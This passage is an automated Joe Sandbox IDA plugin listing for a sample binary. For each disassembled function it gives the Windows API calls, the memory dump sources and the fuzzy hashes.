                                                      • _memset.LIBCMT ref: 00A8707B
                                                        • Part of subcall function 00A88D68: __getptd_noexit.LIBCMT ref: 00A88D68
                                                      • __gmtime64_s.LIBCMT ref: 00A87114
                                                      • __gmtime64_s.LIBCMT ref: 00A8714A
                                                      • __gmtime64_s.LIBCMT ref: 00A87167
                                                      • __allrem.LIBCMT ref: 00A871BD
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A871D9
                                                      • __allrem.LIBCMT ref: 00A871F0
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A8720E
                                                      • __allrem.LIBCMT ref: 00A87225
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A87243
                                                      • __invoke_watson.LIBCMT ref: 00A872B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                      • Instruction ID: 5472d37e4c038af4dcdd618c4b3bd57b6a5ef19705f128b7fccd232a7c30c831
                                                      • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                      • Instruction Fuzzy Hash: 4E71B572A04716ABEB14BF79CD81BAEB3F8AF15724F24422AF514E6681F770DD408790
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AC2A31
                                                      • GetMenuItemInfoW.USER32(00B26890,000000FF,00000000,00000030), ref: 00AC2A92
                                                      • SetMenuItemInfoW.USER32(00B26890,00000004,00000000,00000030), ref: 00AC2AC8
                                                      • Sleep.KERNEL32(000001F4), ref: 00AC2ADA
                                                      • GetMenuItemCount.USER32(?), ref: 00AC2B1E
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00AC2B3A
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00AC2B64
                                                      • GetMenuItemID.USER32(?,?), ref: 00AC2BA9
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AC2BEF
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AC2C03
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AC2C24
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: 7ece74779ee394b64225b9b500d0d919d8a4449b8b96367395f6969791ec6abf
                                                      • Instruction ID: defe9c2cc937e89a70a2ce51b346175fb6236a9d093dd4dba8471843a724266f
                                                      • Opcode Fuzzy Hash: 7ece74779ee394b64225b9b500d0d919d8a4449b8b96367395f6969791ec6abf
                                                      • Instruction Fuzzy Hash: 4C619DB0904249EFDB21CFA4C988FBEBBB8EB41344F16456DE841A7251DB31AD16DB21
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AE7214
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AE7217
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AE723B
                                                      • _memset.LIBCMT ref: 00AE724C
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AE725E
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AE72D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: b9c9e071841d90f6854085cb28bae43b7bf77a7e0f96cb8b585b6de2f092a322
                                                      • Instruction ID: e0a690ad66f5124d6b8552a20a41ecb181b83f44fbb8823eba56f8d4a94da5ba
                                                      • Opcode Fuzzy Hash: b9c9e071841d90f6854085cb28bae43b7bf77a7e0f96cb8b585b6de2f092a322
                                                      • Instruction Fuzzy Hash: 76618D71900288AFDB21DFA4CC81EEE77F8EB09700F14015AFA15AB2A1D770AD42DB60
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AB7135
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00AB718E
                                                      • VariantInit.OLEAUT32(?), ref: 00AB71A0
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AB71C0
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00AB7213
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AB7227
                                                      • VariantClear.OLEAUT32(?), ref: 00AB723C
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00AB7249
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AB7252
                                                      • VariantClear.OLEAUT32(?), ref: 00AB7264
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AB726F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: d4731310f3d768633427003b89f4428c24de27e27bd41ac62c35f87936cd49ec
                                                      • Instruction ID: 1e7de2766b2a35f00e9ca1ed73d742073566f6ab26f64d27bc0b25850e076850
                                                      • Opcode Fuzzy Hash: d4731310f3d768633427003b89f4428c24de27e27bd41ac62c35f87936cd49ec
                                                      • Instruction Fuzzy Hash: CF4144759041199FCF00DFA8D984DEEBBB9FF48354F008065F955AB262CB70A946CB90
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00AD5AA6
                                                      • inet_addr.WSOCK32(?,?,?), ref: 00AD5AEB
                                                      • gethostbyname.WSOCK32(?), ref: 00AD5AF7
                                                      • IcmpCreateFile.IPHLPAPI ref: 00AD5B05
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AD5B75
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AD5B8B
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AD5C00
                                                      • WSACleanup.WSOCK32 ref: 00AD5C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: 643d2374570cc2c090ba4ff529277f5af868f77c2ff55ba951a0bdb1f72b5b34
                                                      • Instruction ID: 723add6a098fbabf798c3093ab59fd6b03823e61996a1a98dad7f9da78028d06
                                                      • Opcode Fuzzy Hash: 643d2374570cc2c090ba4ff529277f5af868f77c2ff55ba951a0bdb1f72b5b34
                                                      • Instruction Fuzzy Hash: 20516B31A047009FDB21EF74C989B2AB7F4EF48750F14892BF556DB2A1EB70E9418B45
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ACB73B
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00ACB7B1
                                                      • GetLastError.KERNEL32 ref: 00ACB7BB
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00ACB828
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: 701b9099a869e721f411963f989070b496c4405cd7e349fa75a400bb1cfe07a1
                                                      • Instruction ID: abd1e108edab28c8226fe14f1548fe50248f7ad12a6e20a4564eb86b1fd97572
                                                      • Opcode Fuzzy Hash: 701b9099a869e721f411963f989070b496c4405cd7e349fa75a400bb1cfe07a1
                                                      • Instruction Fuzzy Hash: 49319435A112099FDB00EF64C986FEE7BB8EF44700F15406DE902DB291DB729D42C761
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AB94F6
                                                      • GetDlgCtrlID.USER32 ref: 00AB9501
                                                      • GetParent.USER32 ref: 00AB951D
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AB9520
                                                      • GetDlgCtrlID.USER32(?), ref: 00AB9529
                                                      • GetParent.USER32(?), ref: 00AB9545
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AB9548
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: bc14236dfb1cc55b51c7719cf0195e598236054ebecaa0f04aff21bf03f325f8
                                                      • Instruction ID: bf2cad5d223125f670ccc5546738f652e298fcbe78dc74b16561a332bf6f019c
                                                      • Opcode Fuzzy Hash: bc14236dfb1cc55b51c7719cf0195e598236054ebecaa0f04aff21bf03f325f8
                                                      • Instruction Fuzzy Hash: 7E21E270900284AFDF04EBA0CCC5EFEBB79EF55300F104155B661972E2DB759919DB20
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                        • Part of subcall function 00ABB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ABB0E7
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AB95DF
                                                      • GetDlgCtrlID.USER32 ref: 00AB95EA
                                                      • GetParent.USER32 ref: 00AB9606
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AB9609
                                                      • GetDlgCtrlID.USER32(?), ref: 00AB9612
                                                      • GetParent.USER32(?), ref: 00AB962E
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AB9631
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: 6077d7edc3ae42138853d3fc83f5463e2f95dc4e7ea5676525ddb695c7a08cfb
                                                      • Instruction ID: 610c4d8c2e5588916debf2efdb80cad74034a0d692dc22fa5e0c9608ba086a0a
                                                      • Opcode Fuzzy Hash: 6077d7edc3ae42138853d3fc83f5463e2f95dc4e7ea5676525ddb695c7a08cfb
                                                      • Instruction Fuzzy Hash: 7A21D070A00284BFDF00EBA4CCD5EFEBBB9EF58300F104155BA61972A2DB759919DB20
                                                      APIs
                                                      • GetParent.USER32 ref: 00AB9651
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00AB9666
                                                      • _wcscmp.LIBCMT ref: 00AB9678
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AB96F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: 2d4b1047ab09090e4a7815a3a5d7add346618c23c1242d074a82f4e0baafb2d3
                                                      • Instruction ID: edd034a2c8215d7200e6c697c68837c7ea30a51767117e289bcd24ac6508f907
                                                      • Opcode Fuzzy Hash: 2d4b1047ab09090e4a7815a3a5d7add346618c23c1242d074a82f4e0baafb2d3
                                                      • Instruction Fuzzy Hash: 7A11C677248387BAFE012720DC2BDE777DDDB15B60F200166FA04A50E2FEA269515B58
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00AD8BEC
                                                      • CoInitialize.OLE32(00000000), ref: 00AD8C19
                                                      • CoUninitialize.OLE32 ref: 00AD8C23
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00AD8D23
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AD8E50
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00AF2C0C), ref: 00AD8E84
                                                      • CoGetObject.OLE32(?,00000000,00AF2C0C,?), ref: 00AD8EA7
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00AD8EBA
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AD8F3A
                                                      • VariantClear.OLEAUT32(?), ref: 00AD8F4A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: 4cc92b2f0b4374deeacaad0119f22a4623557f0b0a4bc862a5edf03db50a4595
                                                      • Instruction ID: c3f2485f04f7bef7816221fcebf4dea59224a9c990ac5e6a4e008b2fe0efc500
                                                      • Opcode Fuzzy Hash: 4cc92b2f0b4374deeacaad0119f22a4623557f0b0a4bc862a5edf03db50a4595
                                                      • Instruction Fuzzy Hash: 6FC10371608305AFC700DF68C88496BB7E9FF89748F00496EF58A9B251DB75ED06CB52
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00AC419D
                                                      • __swprintf.LIBCMT ref: 00AC41AA
                                                        • Part of subcall function 00A838D8: __woutput_l.LIBCMT ref: 00A83931
                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00AC41D4
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00AC41E0
                                                      • LockResource.KERNEL32(00000000), ref: 00AC41ED
                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00AC420D
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00AC421F
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00AC422E
                                                      • LockResource.KERNEL32(?), ref: 00AC423A
                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00AC429B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                      • String ID:
                                                      • API String ID: 1433390588-0
                                                      • Opcode ID: fb895ccd5007e306440a6b443ca043b257c3a2b9b1f1bc9ecae9908465495ad6
                                                      • Instruction ID: c97fcb0cbc953e52844730c525ea35e59a5355f6106dfc291b858a77c1ac27af
                                                      • Opcode Fuzzy Hash: fb895ccd5007e306440a6b443ca043b257c3a2b9b1f1bc9ecae9908465495ad6
                                                      • Instruction Fuzzy Hash: 49319F7160524AAFDB119FA0DC95EFF7BA8EF18301F054529F901D6150DB30DA528BA8
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00AC1700
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC1714
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00AC171B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC172A
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC173C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC1755
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC1767
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC17AC
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC17C1
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AC0778,?,00000001), ref: 00AC17CC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 8a5c3284a9268a962bff08b693b5c725a10190cc8ab7c708c5b8e50df3873816
                                                      • Instruction ID: 3e5239cfaef02e1592ad725c8235493ac69c8df064a55e1b403660865e996a7d
                                                      • Opcode Fuzzy Hash: 8a5c3284a9268a962bff08b693b5c725a10190cc8ab7c708c5b8e50df3873816
                                                      • Instruction Fuzzy Hash: 6431AE75748284AFEB21DF54DD84F697BA9EB56711F128028F8008B2A1DF709D428F64
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A6FC06
                                                      • OleUninitialize.OLE32(?,00000000), ref: 00A6FCA5
                                                      • UnregisterHotKey.USER32(?), ref: 00A6FDFC
                                                      • DestroyWindow.USER32(?), ref: 00AA4A00
                                                      • FreeLibrary.KERNEL32(?), ref: 00AA4A65
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AA4A92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 27c4fcd0fcd3a222d756f254ac1c05abbfa1e5a8b216e59eab0a936d0b3f7997
                                                      • Instruction ID: 373b33122b4e51f305acfbc8a51b452191878846ce8c392978b73263e6b3d35f
                                                      • Opcode Fuzzy Hash: 27c4fcd0fcd3a222d756f254ac1c05abbfa1e5a8b216e59eab0a936d0b3f7997
                                                      • Instruction Fuzzy Hash: D9A17C31701212CFCB29EF54D999E69F774AF59740F1482ADF80AAB2A1CB30AD16CF54
                                                      APIs
                                                      • EnumChildWindows.USER32(?,00ABAA64), ref: 00ABA9A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: e10d613a9862087094dfc6ad0f94e7dd165d6f38e4cac87a118d8d73eaac17f8
                                                      • Instruction ID: 767237df07aa217c0755a4fc59e41e42acd3632bef103c2103e2d3f6923385a5
                                                      • Opcode Fuzzy Hash: e10d613a9862087094dfc6ad0f94e7dd165d6f38e4cac87a118d8d73eaac17f8
                                                      • Instruction Fuzzy Hash: D391B631A00246EBDB58EF70C581BEDFBB9FF14304F508119D99AA7142DF306A99DBA1
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00A62EAE
                                                        • Part of subcall function 00A61DB3: GetClientRect.USER32(?,?), ref: 00A61DDC
                                                        • Part of subcall function 00A61DB3: GetWindowRect.USER32(?,?), ref: 00A61E1D
                                                        • Part of subcall function 00A61DB3: ScreenToClient.USER32(?,?), ref: 00A61E45
                                                      • GetDC.USER32 ref: 00A9CF82
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A9CF95
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00A9CFA3
